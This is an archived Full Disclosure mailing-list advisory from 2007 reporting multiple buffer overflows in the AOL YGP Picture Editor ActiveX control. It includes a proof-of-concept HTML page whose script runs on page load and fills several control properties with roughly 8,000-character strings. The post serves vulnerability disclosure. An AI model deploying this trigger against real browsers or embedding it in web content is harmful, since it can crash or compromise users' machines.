Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows
From: Elazar Broad <elazarb () earthlink net>
Date: Tue, 25 Dec 2007 18:29:52 -0500 (GMT-05:00)

The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer 
overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as 
follows:

----------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
    var s = 'A';

    while (s.length <= 8175) s = s + 'A';


   obj.DisplayName = s;
   obj.DisplayName = s;
   obj.FinalSavePath = s;
   obj.ForceSaveTo = s;
   obj.HiddenControls = s;
   obj.InitialEditorScreen = s;
   obj.Locale = s;
   obj.Proxy = s;
   obj.UserAgent = s;

   
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>
----------------

Happy Holidays to all!

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault